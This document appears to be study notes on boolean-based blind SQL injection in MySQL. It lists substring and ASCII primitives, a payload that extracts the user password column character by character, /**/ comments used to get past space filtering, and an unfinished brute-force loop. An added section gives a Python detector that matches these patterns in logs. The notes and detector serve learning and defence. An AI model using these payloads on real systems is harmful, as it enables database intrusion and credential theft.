Boolean-based blind injection
- if(xxxx,1,0)
- substring('xxxx' from 1 for 1)
- select substr('abc' from 1 for 1)
- Takes one character from 'abc', starting at position 1
- mid('abc' , 1 ,1 ) = mid('abc' from 1 for 1)
- left(str,length): takes length characters starting from the left of the string
Converting to ASCII
- ascii(substr('xxx',1,1))=97
- ord() // returns the ASCII code of the first character
userid=ascii(substr((select password from user) from 1 for 1))=127
Bypass when spaces are filtered: use the inline comment /**/ in place of spaces
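```python
import requests

dicts = 'abcdefghijklmnopqrstuvwxyz0123456789'
flag = ''
for i in range(1, 50):      # character position
    for ch in dicts:        # candidate character
        url = ' '           # left blank in the notes
        try:
            response = requests.get(url, timeout=5)
        except requests.RequestException:
            continue        # request failed or timed out
        if 'error password' in response.text:
            pass
```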
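
Seen from the log side, the primitives in these notes leave a recognizable shape. The following is an added example, not part of the original notes: it turns `/**/` comments into spaces before matching and flags clients that send repeated character-comparison requests. The signature names, the threshold and the sample log entries are assumptions constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Signatures (names are assumptions) for the MySQL primitives listed in these notes.
SIGNATURES = {
    "char_compare": re.compile(r"\b(?:ascii|ord)\s*\(\s*\(?\s*(?:substr|substring|mid|left)\s*\("),
    "from_for": re.compile(r"\b(?:substr|substring|mid)\s*\(.*?\bfrom\s+\d+\s+for\s+\d+"),
    "if_1_0": re.compile(r"\bif\s*\(.+,\s*1\s*,\s*0\s*\)"),
}
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)

def normalize(raw_query):
    """URL-decode, lower-case, and replace /*...*/ comments with spaces."""
    text = unquote_plus(raw_query).lower()
    text = INLINE_COMMENT.sub(" ", text)
    return re.sub(r"\s+", " ", text)

def match_signatures(raw_query):
    """Return the sorted names of all signatures found in one query string."""
    text = normalize(raw_query)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

def flag_clients(entries, threshold=3):
    """Blind extraction needs many requests: flag clients with >= threshold hits."""
    hits = Counter(ip for ip, query in entries if match_signatures(query))
    return {ip: n for ip, n in hits.items() if n >= threshold}

# Constructed sample (client IP, query string) pairs; not real traffic.
SAMPLE_LOG = [
    ("203.0.113.7", "userid=ascii(substr((select/**/password/**/from/**/user)from/**/1/**/for/**/1))=97"),
    ("203.0.113.7", "userid=ascii(substr((select/**/password/**/from/**/user)from/**/1/**/for/**/1))=98"),
    ("203.0.113.7", "userid=ord(mid((select%20password%20from%20user),2,1))=99"),
    ("198.51.100.4", "userid=42&note=left+the+office+early"),
    ("198.51.100.4", "q=if+you+can"),
]

if __name__ == "__main__":
    for ip, query in SAMPLE_LOG:
        print(ip, match_signatures(query))
    print(flag_clients(SAMPLE_LOG))
```

A check that looks for the literal text `select password` misses the first sample entry, because `/**/` stands where the spaces would be; after `normalize()` the same check matches.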